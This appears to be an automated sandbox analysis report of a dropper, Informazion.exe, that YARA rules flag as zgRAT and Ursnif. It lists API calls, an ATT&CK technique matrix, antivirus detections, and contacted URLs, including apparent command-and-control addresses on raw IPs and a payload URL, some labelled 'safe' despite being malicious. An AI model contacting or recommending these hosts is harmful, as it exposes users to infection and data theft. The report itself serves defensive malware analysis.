Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

7_2_00401178

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Code function: 7_2_01095710 cpuid

7_2_01095710

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C518964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

0_2_00007FF64C518964

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C512C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,

0_2_00007FF64C512C54

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Code function: 7_2_01095710 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

7_2_01095710

Stealing of Sensitive Information

Yara detected zgRAT

Source: Yara match	File source: 1.2.maintainabovl.exe.3d42f70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d82f90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.c0e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected zgRAT

Source: Yara match	File source: 1.2.maintainabovl.exe.3d42f70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d82f90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.c0e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot
Domain Accounts	1 PowerShell	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Software Packing	NTDS	136 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	11 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	121 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	111 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Rundll32	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Informazion.exe	15%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	100%	Avira	TR/Crypt.OPACK.Gen

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.maintainabovl.exe.2deb5a8.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.maintainabovl.exe.2e0cee0.3.unpack	100%	Avira	TR/Patched.Ren.Gen4	Download File
7.2.maintainabovl.exe.1090000.1.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
1.2.maintainabovl.exe.2d6f3f8.4.unpack	100%	Avira	TR/Patched.Ren.Gen4	Download File
7.2.maintainabovl.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
1.2.maintainabovl.exe.2e03a34.0.unpack	100%	Avira	TR/Patched.Ren.Gen4	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.sajatypeworks.comiv	0%	URL Reputation	safe
http://www.sajatypeworks.com2	0%	URL Reputation	safe
http://www.sajatypeworks.com2	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://193.0.178.157/drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/6	0%	URL Reputation	safe
http://62.173.149.202/drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnr	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/$	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.fontbureau.comF	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/U	0%	URL Reputation	safe
http://www.sajatypeworks.comt	0%	URL Reputation	safe
http://en.wikipedia	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.comueTFg	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y0/L	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com3	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/q	0%	URL Reputation	safe
http://www.founder.com.cn/cn3	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/-	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/g	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/h	0%	URL Reputation	safe
http://www.fontbureau.comM.TTF	0%	URL Reputation	safe
http://www.fontbureau.comsivaz	0%	Avira URL Cloud	safe
http://193.0.	0%	Avira URL Cloud	safe
https://christianbeltran.co/wp-admin/images/css/ground/bo/Zujiies.png	0%	Avira URL Cloud	safe
http://www.fontbureau.comrsivL	0%	Avira URL Cloud	safe
https://christianbeltran.co	0%	Avira URL Cloud	safe
http://en.w.	0%	Avira URL Cloud	safe
http://www.fontbureau.coma6	0%	Avira URL Cloud	safe
http://www.fontbureau.comkh	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnved3	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
christianbeltran.co	174.142.60.54	true	false		unknown
checklist.skype.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://193.0.178.157/drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk	true	Avira URL Cloud: safe	unknown
http://62.173.149.202/drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk	true	Avira URL Cloud: safe	unknown
https://christianbeltran.co/wp-admin/images/css/ground/bo/Zujiies.png	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.comiv	maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360947397.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360260221.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comueTFg	maintainabovl.exe, 00000001.00000003.497054924.0000000005B40000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.367935918.0000000005B4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com2	maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360947397.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360260221.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com3	maintainabovl.exe, 00000001.00000003.359487940.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361457955.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360047358.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360497987.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360795643.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359836394.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359434008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360104400.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359854375.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360533756.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361348206.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359601495.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360865725.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359672275.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359460008.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359523858.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.359910893.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361273550.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.361009593.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360348836.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.360980960.0000000005B5B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
